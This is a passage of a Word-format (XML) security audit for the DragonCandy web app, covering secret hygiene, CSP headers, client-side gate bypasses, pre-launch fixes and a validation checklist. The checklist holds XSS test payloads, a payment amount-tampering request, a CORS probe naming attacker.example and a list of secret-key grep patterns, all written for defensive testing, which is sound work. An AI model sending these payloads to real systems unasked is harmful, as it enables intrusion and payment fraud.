        <w:t xml:space="preserve">, migrate to encrypted columns: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ALTER TABLE toast_connections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ALTER COLUMN access_token TYPE text USING pgsodium.crypto_aead_det_encrypt(...);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…and document the key rotation procedure.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Headers, CORS, Secrets, .env</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="200"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">8.1 ✅ Secret hygiene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.env</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> contains only </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="F1F5F9" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">VITE_*</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> keys (Google Maps, reCAPTCHA site key, Supabase URL, Supabase anon key, project ID). All public by design.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grep</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> for </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="F1F5F9" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">SUPABASE_SERVICE_ROLE_KEY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STRIPE_SECRET_KEY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OPENAI_API_KEY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ANTHROPIC_API_KEY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CLAUDE_API_KEY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TOAST_CLIENT_SECRET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sk_live_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pk_live_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whsec_*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AKIA*</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="F1F5F9" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">src/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> returned </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">zero hits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.gitignore</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> correctly excludes </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="F1F5F9" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">.env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.env.local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.env.*.local</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, allows </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="F1F5F9" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">.env.example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8.2 LOW — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="F1F5F9" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">supabase/.temp/linked-project.json</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> in working tree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?? supabase/.temp/linked-project.json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in git history. Add </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="F1F5F9" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">supabase/.temp/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="F1F5F9" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">.gitignore</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to prevent accidental commits.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8.3 MEDIUM — No CSP / X-Frame-Options / etc.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Lovable.dev does not expose HTTP response header configuration (no </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="F1F5F9" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">_headers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vercel.json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netlify.toml</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> equivalent). HSTS is likely set by Lovable's CDN edge but is out of your control.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You can still set a meta-tag CSP in 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 to defend against script injection. Given the integrations (Supabase, Stripe, Google Maps, Claude/OpenAI via Supabase functions, Lovable), a workable starting policy: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http-equiv="Content-Security-Policy" content="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default-src 'self';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script-src 'self' 'unsafe-inline' https://maps.googleapis.com https://www.google.com https://www.gstatic.com https://js.stripe.com;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style-src 'self' 'unsafe-inline' https://fonts.googleapis.com;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font-src 'self' https://fonts.gstatic.com;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img-src 'self' data: blob: https://*.supabase.co https://*.googleusercontent.com https://maps.gstatic.com;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media-src 'self' blob: https://*.supabase.co;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connect-src 'self' https://*.supabase.co wss://*.supabase.co https://api.stripe.com https://www.google.com https://www.recaptcha.net;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frame-src https://js.stripe.com https://www.google.com;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frame-ancestors 'none';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base-uri 'self';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form-action 'self';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'unsafe-inline'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> for scripts is required because Vite injects inline modules; a tighter CSP requires migrating to nonces or hash-based allowlisting (non-trivial on Lovable). The above blocks most stored-XSS and clickjacking even with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="F1F5F9" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">'unsafe-inline'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> because external script sources are tightly controlled.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Also add (via </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="F1F5F9" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;meta&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">):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&lt;meta http-equiv="X-Content-Type-Options" content="nosniff"&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — but this doesn't actually work via meta tag; needs a real header.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&lt;meta name="referrer" content="strict-origin-when-cross-origin"&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — works.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8.4 ✅ CSRF immune (localStorage JWT)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Supabase's JS client stores the JWT in localStorage (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="F1F5F9" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">src/integrations/supabase/client.ts</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">). Cross-origin pages cannot read localStorage, so they cannot impersonate a logged-in user. Every edge function requires explicit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 &lt;jwt&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. No CSRF token is necessary.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cost is XSS exposure: if an attacker lands an XSS, they read the JWT from localStorage. This is why §4 (XSS hardening) is the highest-leverage area in the audit.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8.5 LOW — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="F1F5F9" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">vite.config.ts</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> dev server binds </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="F1F5F9" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">0.0.0.0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server: { host: "0.0.0.0", port: 8080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Dev only — Lovable's production build uses its own server. But on a CI runner or developer's home WiFi, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="F1F5F9" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">0.0.0.0</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> exposes the dev server LAN-wide. Set to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="F1F5F9" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">127.0.0.1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> unless you specifically need external access.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8.6 ✅ Logging hygiene</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The 305 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="F1F5F9" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">console.log/error/warn</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> calls (separate from this audit, per the code-architecture report) were spot-checked in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="F1F5F9" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">AuthContext.tsx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useAuth.tsx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client.ts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UpdatePassword.tsx</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. None log JWTs, session objects, user IDs, or Stripe IDs. The remaining cleanup is hygienic (noise reduction), not security.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SiteGate — bypass surface (consolidated)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87"/>
        <w:gridCol w:w="3585"/>
        <w:gridCol w:w="268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Vector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p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Read password from JS bundle</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">✅ Trivially possible — by design (client-side gate)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Treat as friction, not security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localStorage.setItem('dc_site_unlocked_until', big_number)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">✅ Bypasses immediately</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Same — gate is not a security boundary</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Path traversal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/promo/../dashboard</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">❌ Not exploitable — React Router normalizes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</w:tr>
      <w:tr>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Prefix collision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/promotions-x</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> matches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/promo/</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">❌ Not exploitable —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startsWith('/promo/')</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> requires the trailing slash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</w:tr>
      <w:tr>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Direct edge-function calls</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">✅ Bypasses the gate (gate is React-only); but RLS / function auth still applies</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Confirm every edge function does its own auth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dc_site_unlocked_until</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> survives logout</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">⚠️ Yes — should be cleared</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">See §3.3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Bottom line on SiteGate:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> it's a "keep crawlers and casual visitors out" device, not a security control. RLS and edge-function auth are the actual security boundaries — they don't depend on SiteGate.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What to fix before live Stripe keys turn on</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The PDF is explicit that DragonCandy is pre-revenue and Stripe is in test mode. Before flipping live keys, fix at minimum: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§6.1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Amount tampering in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="F1F5F9" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">create-sponsorship-checkout</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (and audit every other Stripe-creating function for the same pattern).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§7.1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Confirm Toast webhook signature verification.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§4.1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> HTML-escape every UGC field in email templates.</w:t>
      </w:r>
    </w:p>
    <w:p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 xml:space="preserve">§2 (CRITICAL items)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Add the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="F1F5F9" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">messages</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> conversation policy and the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="F1F5F9" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">discount_codes</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> redemption path (or document the service-role bypass).</w:t>
      </w:r>
    </w:p>
    <w:p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 xml:space="preserve">§5.1, §5.2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Make </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="F1F5F9" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">profile-assets</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> private + add server-side MIME validation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
        <w:ind w:left="20"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">6. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">§4.2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Apply </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="F1F5F9" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">safeUrl()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to every user-controlled </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="F1F5F9" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">href</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
        <w:ind w:left="20"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">7. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">§3.1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Clear React Query cache on logout.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
        <w:ind w:left="20"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">8. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">§7.2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Rate-limit LLM endpoints.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Items in §2 (HIGH), §4 (MEDIUM), §7.3-7.6, §8 are appropriate to fix in the weeks after launch.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Validation Checklist</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Before you mark anything fixed, confirm with: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RLS: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psql</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> as a normal authenticated user → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="F1F5F9" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT * FROM messages WHERE conversation_id = '&lt;other-user-conversation&gt;';</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> should return zero rows.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Stripe amount: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curl create-sponsorship-checkout</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="F1F5F9" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">{"sponsorshipId": "x", "amount": 0.01}</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and confirm Stripe receives the DB amount, not the client amount.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Email XSS:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> create a campaign titled </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="F1F5F9" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;img src=x onerror=alert(1)&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, trigger the application-received email, view source in Gmail's web client. Should render as text, not an </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="F1F5F9" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;img&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> tag.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URL XSS:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> set </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="F1F5F9" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">creator_profiles.website_url = 'javascript:alert(1)'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, view the public profile, click the link. Should be a no-op (or open </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="F1F5F9" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">about:blank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Logout cache:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> log in as A, navigate to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/dashboard/business/campaigns</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, log out, log in as B, immediately navigate to the same page. Network tab should show fresh queries with B's auth header — no stale data flash.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CORS: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curl -H 'Origin: https://attacker.example' -X OPTIONS https://&lt;project&gt;.functions.supabase.co/release-creator-payout</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → response </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="F1F5F9" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">Access-Control-Allow-Origin</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> should be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https://dragoncandy.io</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, not echo </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="F1F5F9" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">attacker.example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SiteGate cleanup:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> log in, log out, run </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="F1F5F9" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">localStorage.getItem('dc_site_unlocked_until')</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> in DevTools → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="F1F5F9" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">null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MIME validation:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> upload </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="F1F5F9" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;svg onload="alert(1)"/&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> renamed to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="F1F5F9" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">evil.png</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> with MIME </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="F1F5F9" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">image/png</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Should be rejected by the server-side validator after magic-byte sniff.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Files Referenced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supabase/migrations/20250615093714_*.sql                    profiles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supabase/migrations/20250615233039_*.sql                    creator_profiles, business_profiles, profile-assets bucket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supabase/migrations/20250616011059_*.sql                    campaigns, applications, messages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supabase/migrations/20250616224436_*.sql                    invitations, matches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supabase/migrations/20250617111927_*.sql                    public visibility flags, profile_views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supabase/migrations/20250617113401_*.sql                    conversations, conversation_participants, presence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supabase/migrations/20250617123640_*.sql                    file_uploads, versions, permissions, comments, tags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supabase/migrations/20250617125137_*.sql                    file_uploads tightening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supabase/migrations/20250617130412_*.sql                    project_reviews, review_responses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supabase/migrations/20250617134944_*.sql                    analytics_events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supabase/migrations/20250617160641_*.sql                    feature_flags, beta_feedback, anon analytics insert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supabase/migrations/20251001203644_*.sql                    campaign_sponsorships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supabase/migrations/20251014150439_*.sql                    email_verification_tokens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supabase/migrations/20251209163242_*.sql                    promotions, discount_codes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supabase/migrations/20260408100000_private_deliverables_bucket.sql   campaign-deliverables → private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supabase/migrations/20260326000000_donny_oauth_codes.sql    donny OAuth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Auth / sessions / SiteGate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src/contexts/AuthContext.tsx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src/hooks/useAuth.tsx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src/hooks/useLogout.ts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src/lib/authCleanup.ts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src/hooks/useInactivityTimeout.ts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src/components/InactivityWarningDialog.tsx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src/components/SiteGateGuard.tsx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src/pages/SiteGate.tsx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src/integrations/supabase/client.ts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src/App.tsx                                                 QueryClient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XSS / UGC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supabase/functions/send-notification-email/index.ts         CRITICAL — email injection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src/components/donny/DonnyMessage.tsx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src/components/creator-browse/CreatorProfileModal.tsx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src/components/campaigns/RestaurantProfileCard.tsx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src/components/ui/chart.tsx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src/lib/fileUtils.ts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src/lib/storage/uploadProfileAsset.ts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src/pages/AdminDragonShareLedger.tsx                        CSV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src/pages/AuthPage.tsx                                      returnTo redirect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src/pages/InviteAcceptPage.tsx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Stripe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supabase/functions/stripe-webhook/index.ts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supabase/functions/create-campaign-escrow/index.ts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supabase/functions/verify-campaign-escrow/index.ts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supabase/functions/refund-campaign-escrow/index.ts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supabase/functions/release-creator-payout/index.ts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supabase/functions/release-sponsorship-payout/index.ts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supabase/functions/create-checkout-session/index.ts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supabase/functions/create-sponsorship-checkout/index.ts     CRITICAL — amount tampering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supabase/functions/boost-payment/index.ts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supabase/functions/create-creator-connect-account/index.ts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supabase/functions/get-watermarked-preview/index.ts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Edge functions / Toast / Donny OAuth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supabase/functions/_shared/                                 add cors.ts + auth helpers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supabase/functions/chat-assistant/index.ts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supabase/functions/donny-chat/index.ts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supabase/functions/donny-orchestrator/index.ts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supabase/functions/donny-oauth-authorize/index.ts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supabase/functions/donny-oauth-token/index.ts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supabase/functions/donny-oauth-userinfo/index.ts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supabase/functions/toast-oauth-start/index.ts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supabase/functions/toast-oauth-callback/index.ts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supabase/functions/toast-token-refresh/index.ts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supabase/functions/toast-redemption-webhook/index.ts        UNCONFIRMED — sig verification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supabase/functions/verify-recaptcha/index.ts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supabase/functions/verify-email/index.ts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supabase/functions/send-verification-email/index.ts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supabase/functions/match-creators/index.ts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Headers / config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index.html                                                  add CSP meta tag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vite.config.ts                                              dev server host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.env / .env.example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.gitignore                                                  add supabase/.temp/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2026-05-02T13:24:35.107Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-05-02T13:24:35.107Z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